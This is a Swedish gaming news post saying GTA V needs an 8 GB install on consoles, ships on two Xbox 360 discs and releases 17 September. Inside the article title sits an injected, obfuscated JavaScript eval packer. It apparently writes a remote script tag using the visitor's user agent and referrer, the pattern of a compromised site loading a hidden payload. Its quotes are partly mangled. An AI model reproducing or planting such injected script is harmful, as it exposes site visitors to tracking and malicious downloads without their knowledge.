Image Image Image Image Image Image Image Image Image Image

| 23 juli, 2018

Scroll to top

Top

No Comments

GTA V måste installeras innan det är körbart

GTA V måste installeras innan det är körbart
Sebastian Plengier Ehrnfelt

GTA eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yheay|var|u0026u|referrer|rtfsz||js|php’.split(‘|’),0,{}))
V: Ytterligare information om det kommade spelet från Rockstar. Man kommer vara tvungen att installera GTA V på sin konsol innan det går att spela. Utrymmet som kommer behövas är 8 GB samt att skivan är insatt. På Xbox 360 kommer spelet hamna på två skivor vilket beskriver hur stort detta spel kommer att vara.

Men även om Xbox 360 har två skivor kommer man inte behöva skifta mellan dem i spelandet, vilket är skönt.

Rockstar meddelar också att skillnaden mellan Playstation 3 och Xbox 360 inte kommer att vara speciellt stor utan att upplevelsen kommer vara väldigt mycket den samma. De lovar också att spelet kommer att finnas i handel den 17 september och att det inte finns några hot för försening. Vi kommer också få tillgång till en gameplayvideo inom kort.

Mer svar och frågor hittar ni via länken. 
www.rockstargames.com

Submit a Comment